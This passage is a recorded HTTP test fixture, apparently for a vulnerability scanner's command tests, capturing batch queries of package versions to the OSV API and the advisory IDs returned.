1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": 
"0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Sarif_with_vulns url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Scan_locks-many url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 270 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/all_supported_lockfiles_in_the_directory_should_be_checked url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 
content_length: 3372 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" }, { "commit": "4579d5538f06c5ef615a15bc67ebb9ac0523a973" }, { "commit": "9de7a0544457c6aba755ccb65abb41b0dc1db70d" }, { "commit": "5d60bd2eb4642b64d00c845e5ca9f1ea41fd6db6" }, { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.13-r0" }, { "package": { "ecosystem": "Packagist", "name": "drupal/core" }, "version": "10.4.5" }, { "package": { "ecosystem": "Packagist", "name": "drupal/simple_sitemap" }, "version": "4.2.1" }, { 
"package": { "ecosystem": "Packagist", "name": "drupal/tfa" }, "version": "2.0.0-alpha4" }, { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "Packagist", "name": "theseer/tokenizer" }, "version": "1.1.3" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/config_file_can_be_broad url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 1281 body: | { "results": [ { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "CVE-2023-39137", "modified": "2026-03-15T14:11:43.205446Z" }, { "id": "CVE-2023-39139", "modified": "2026-03-14T12:08:30.752661Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] }, { "vulns": [ { "id": "DRUPAL-CORE-2025-005", "modified": "2025-12-10T23:41:07.744028Z" }, { "id": "DRUPAL-CORE-2025-006", "modified": "2025-12-10T23:41:16.689525Z" }, { "id": "DRUPAL-CORE-2025-007", "modified": "2025-12-10T23:41:19.050806Z" }, { "id": "DRUPAL-CORE-2025-008", "modified": "2025-12-10T23:41:00.167393Z" }, { "id": "GHSA-83v7-c2cf-p9c2", "modified": "2025-12-10T23:41:07.744028Z" }, { "id": "GHSA-h89p-5896-f4q8", "modified": "2025-12-10T23:41:19.050806Z" }, { "id": "GHSA-m6vv-vcj8-w8m7", "modified": "2025-12-10T23:41:16.689525Z" }, { "id": "GHSA-mhpg-hpj5-73r2", "modified": "2026-02-03T03:15:35.495869Z" } ] }, { "vulns": [ { "id": "DRUPAL-CONTRIB-2025-083", "modified": "2025-12-10T23:41:32.857305Z" } ] }, {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": 
"2026-03-13T22:01:08.982482Z" } ] }, {}, {} ] } headers: Content-Length: - "1281" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/config_file_is_invalid url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/config_files_should_not_have_multiple_ignores_with_the_same_id url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 638 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "has-flag" }, "version": "4.0.0" }, { "package": { "ecosystem": "npm", "name": "wrappy" }, "version": "1.0.2" }, { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, 
"version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/cyclonedx_1.4_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 107 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, {}, {} ] } headers: Content-Length: - "107" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 638 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "has-flag" }, "version": "4.0.0" }, { "package": { "ecosystem": "npm", "name": "wrappy" }, "version": "1.0.2" }, { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/cyclonedx_1.5_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 107 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, {}, {} ] } headers: Content-Length: - "107" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 278 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/exclude_with_exact_directory_name url: https://api.osv.dev/v1/querybatch method: POST 
response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 278 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/exclude_with_glob_pattern url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 278 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/exclude_with_multiple_exact_directories url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 278 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/exclude_with_multiple_pattern_types url: https://api.osv.dev/v1/querybatch method: POST response: proto: 
HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 149 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/exclude_with_regex_pattern url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 156 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu", "name": "pcre3" }, "version": "2:8.39-12ubuntu0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/folder_of_supported_sbom_with_only_unimportant url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 97 body: | { "results": [ { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] } ] } headers: Content-Length: - "97" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 156 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu", "name": "pcre3" }, "version": "2:8.39-12ubuntu0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/folder_of_supported_sbom_with_only_unimportant#01 url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 97 body: | { "results": [ { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": 
"2026-01-20T16:49:00.053545Z" } ] } ] } headers: Content-Length: - "97" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 23023 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.12-r1" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", 
"name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Ubuntu", "name": "pcre3" }, "version": "2:8.39-12ubuntu0.1" }, { "package": { "ecosystem": "Debian", "name": "adduser" }, "version": "3.115" }, { "package": { "ecosystem": "Debian", "name": "apt" }, "version": "1.4.11" }, { "package": { "ecosystem": "Debian", "name": "base-files" }, "version": "9.9+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "base-passwd" }, "version": "3.5.43" }, { "package": { "ecosystem": "Debian", "name": "bash" }, "version": "4.4-5" }, { "package": { "ecosystem": "Debian", "name": "bsdutils" }, "version": "1:2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "coreutils" }, "version": "8.26-3" }, { "package": { "ecosystem": "Debian", "name": "dash" }, "version": "0.5.8-2.4" }, { "package": { "ecosystem": "Debian", "name": "debconf" }, "version": "1.5.61" }, { "package": { "ecosystem": "Debian", "name": "debian-archive-keyring" }, "version": "2017.5+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "debianutils" }, "version": "4.8.1.1" }, { "package": { "ecosystem": "Debian", "name": "diffutils" }, "version": "1:3.5-3" }, { "package": { "ecosystem": "Debian", "name": "dirmngr" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "dpkg" }, "version": "1.18.25" }, { "package": { "ecosystem": "Debian", "name": "e2fslibs" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "e2fsprogs" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "findutils" }, "version": "4.6.0+git+20161106-2" }, { "package": { "ecosystem": "Debian", "name": "gcc-6-base" }, "version": "6.3.0-18+deb9u1" }, { "package": { 
"ecosystem": "Go", "name": "github.com/opencontainers/runc" }, "version": "v1.0.1" }, { "package": { "ecosystem": "Go", "name": "github.com/tianon/gosu" }, "version": "(devel)" }, { "package": { "ecosystem": "Debian", "name": "gnupg" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "gnupg-agent" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Go", "name": "golang.org/x/sys" }, "version": "v0.0.0-20210817142637-7d9622a276b7" }, { "package": { "ecosystem": "Debian", "name": "gpgv" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "grep" }, "version": "2.27-2" }, { "package": { "ecosystem": "Debian", "name": "gzip" }, "version": "1.6-5+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "hostname" }, "version": "3.18+b1" }, { "package": { "ecosystem": "Debian", "name": "init-system-helpers" }, "version": "1.48" }, { "package": { "ecosystem": "Debian", "name": "libacl1" }, "version": "2.2.52-3+b1" }, { "package": { "ecosystem": "Debian", "name": "libapt-pkg5.0" }, "version": "1.4.11" }, { "package": { "ecosystem": "Debian", "name": "libassuan0" }, "version": "2.4.3-2" }, { "package": { "ecosystem": "Debian", "name": "libattr1" }, "version": "1:2.4.47-2+b2" }, { "package": { "ecosystem": "Debian", "name": "libaudit-common" }, "version": "1:2.6.7-2" }, { "package": { "ecosystem": "Debian", "name": "libaudit1" }, "version": "1:2.6.7-2" }, { "package": { "ecosystem": "Debian", "name": "libblkid1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libbsd0" }, "version": "0.8.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libbz2-1.0" }, "version": "1.0.6-8.1" }, { "package": { "ecosystem": "Debian", "name": "libc-bin" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libc-l10n" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libc6" }, "version": "2.24-11+deb9u4" }, { "package": { 
"ecosystem": "Debian", "name": "libcap-ng0" }, "version": "0.7.7-3+b1" }, { "package": { "ecosystem": "Debian", "name": "libcomerr2" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libdb5.3" }, "version": "5.3.28-12+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libdebconfclient0" }, "version": "0.227" }, { "package": { "ecosystem": "Debian", "name": "libedit2" }, "version": "3.1-20160903-3" }, { "package": { "ecosystem": "Debian", "name": "libfdisk1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libffi6" }, "version": "3.2.1-6" }, { "package": { "ecosystem": "Debian", "name": "libgcc1" }, "version": "1:6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libgcrypt20" }, "version": "1.7.6-2+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libgdbm3" }, "version": "1.8.3-14" }, { "package": { "ecosystem": "Debian", "name": "libgmp10" }, "version": "2:6.1.2+dfsg-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libgnutls30" }, "version": "3.5.8-5+deb9u6" }, { "package": { "ecosystem": "Debian", "name": "libgpg-error0" }, "version": "1.26-2" }, { "package": { "ecosystem": "Debian", "name": "libgssapi-krb5-2" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libhogweed4" }, "version": "3.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libicu57" }, "version": "57.1-6+deb9u5" }, { "package": { "ecosystem": "Debian", "name": "libidn11" }, "version": "1.33-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libjson-perl" }, "version": "2.90-1" }, { "package": { "ecosystem": "Debian", "name": "libk5crypto3" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libkeyutils1" }, "version": "1.5.9-9" }, { "package": { "ecosystem": "Debian", "name": "libkrb5-3" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libkrb5support0" }, "version": "1.15-1+deb9u3" }, { 
"package": { "ecosystem": "Debian", "name": "libksba8" }, "version": "1.3.5-2" }, { "package": { "ecosystem": "Debian", "name": "libldap-2.4-2" }, "version": "2.4.44+dfsg-5+deb9u8" }, { "package": { "ecosystem": "Debian", "name": "libldap-common" }, "version": "2.4.44+dfsg-5+deb9u8" }, { "package": { "ecosystem": "Debian", "name": "libllvm6.0" }, "version": "1:6.0-1~bpo9+1" }, { "package": { "ecosystem": "Debian", "name": "liblz4-1" }, "version": "0.0~r131-2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "liblzma5" }, "version": "5.2.2-1.2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libmount1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libncurses5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libncursesw5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libnettle6" }, "version": "3.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libnpth0" }, "version": "1.3-1" }, { "package": { "ecosystem": "Debian", "name": "libnss-wrapper" }, "version": "1.1.3-1" }, { "package": { "ecosystem": "Debian", "name": "libp11-kit0" }, "version": "0.23.3-2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libpam-modules" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam-modules-bin" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam-runtime" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam0g" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpcre3" }, "version": "2:8.39-3" }, { "package": { "ecosystem": "Debian", "name": "libperl5.24" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "libpq5" }, "version": "14.2-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "libreadline7" }, "version": "7.0-3" }, { "package": { "ecosystem": "Debian", "name": 
"libsasl2-2" }, "version": "2.1.27~101-g0780600+dfsg-3+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libsasl2-modules-db" }, "version": "2.1.27~101-g0780600+dfsg-3+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libselinux1" }, "version": "2.6-3+b3" }, { "package": { "ecosystem": "Debian", "name": "libsemanage-common" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsemanage1" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsepol1" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsmartcols1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libsqlite3-0" }, "version": "3.16.2-5+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libss2" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libssl1.1" }, "version": "1.1.0l-1~deb9u5" }, { "package": { "ecosystem": "Debian", "name": "libstdc++6" }, "version": "6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libsystemd0" }, "version": "232-25+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "libtasn1-6" }, "version": "4.10-1.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libtinfo5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libudev1" }, "version": "232-25+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "libustr-1.0-1" }, "version": "1.0.4-6" }, { "package": { "ecosystem": "Debian", "name": "libuuid1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libxml2" }, "version": "2.9.4+dfsg1-2.2+deb9u6" }, { "package": { "ecosystem": "Debian", "name": "libxslt1.1" }, "version": "1.1.29-2.1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libzstd1" }, "version": "1.1.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "locales" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "login" }, 
"version": "1:4.4-4.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "lsb-base" }, "version": "9.20161125" }, { "package": { "ecosystem": "Debian", "name": "mawk" }, "version": "1.3.3-17+b3" }, { "package": { "ecosystem": "Debian", "name": "mount" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "multiarch-support" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "ncurses-base" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "ncurses-bin" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "netbase" }, "version": "5.4" }, { "package": { "ecosystem": "Debian", "name": "openssl" }, "version": "1.1.0l-1~deb9u5" }, { "package": { "ecosystem": "Debian", "name": "passwd" }, "version": "1:4.4-4.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "perl" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "perl-base" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "perl-modules-5.24" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "pgdg-keyring" }, "version": "2018.2" }, { "package": { "ecosystem": "Debian", "name": "pinentry-curses" }, "version": "1.0.0-2" }, { "package": { "ecosystem": "Debian", "name": "postgresql-11" }, "version": "11.15-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-client-11" }, "version": "11.15-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-client-common" }, "version": "238.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-common" }, "version": "238.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "readline-common" }, "version": "7.0-3" }, { "package": { "ecosystem": "Debian", "name": "sed" }, "version": "4.4-1" }, { "package": { "ecosystem": "Debian", "name": "sensible-utils" }, "version": "0.0.9+deb9u1" }, { "package": { 
"ecosystem": "Debian", "name": "ssl-cert" }, "version": "1.0.39" }, { "package": { "ecosystem": "Debian", "name": "sysvinit-utils" }, "version": "2.88dsf-59.9" }, { "package": { "ecosystem": "Debian", "name": "tar" }, "version": "1.29b-1.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "tzdata" }, "version": "2021a-0+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "ucf" }, "version": "3.0036" }, { "package": { "ecosystem": "Debian", "name": "util-linux" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "xz-utils" }, "version": "5.2.2-1.2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "zlib1g" }, "version": "1:1.2.8.dfsg-5+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "zstd" }, "version": "1.1.2-1+deb9u1" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { 